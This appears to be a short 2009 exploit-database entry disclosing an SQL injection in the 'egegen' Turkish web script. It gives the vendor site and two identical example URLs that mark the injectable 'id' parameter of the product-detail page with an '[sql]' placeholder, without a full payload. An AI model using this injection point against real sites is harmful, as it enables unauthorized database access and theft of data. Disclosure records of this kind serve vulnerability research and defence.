id: 10478
date: 12/28/2009
title: egegen turkish script SQL Injection Vulnerability
author: FormatXFormaT
cves: 

=================================================
egegen turkish script SQL Injection Vulnerability
=================================================

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=
egegen turkish script SQL Injection Vulnerability
 
script: egegen
 
Site script: http://www.egegen.com/
 
 
=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=
 
Exploit:
http://www.localhost.com/index.php?page=urunDetay&id=[sql]
http://www.localhost.com/index.php?page=urunDetay&id=[sql]



#  0day.today [2023-03-26]  #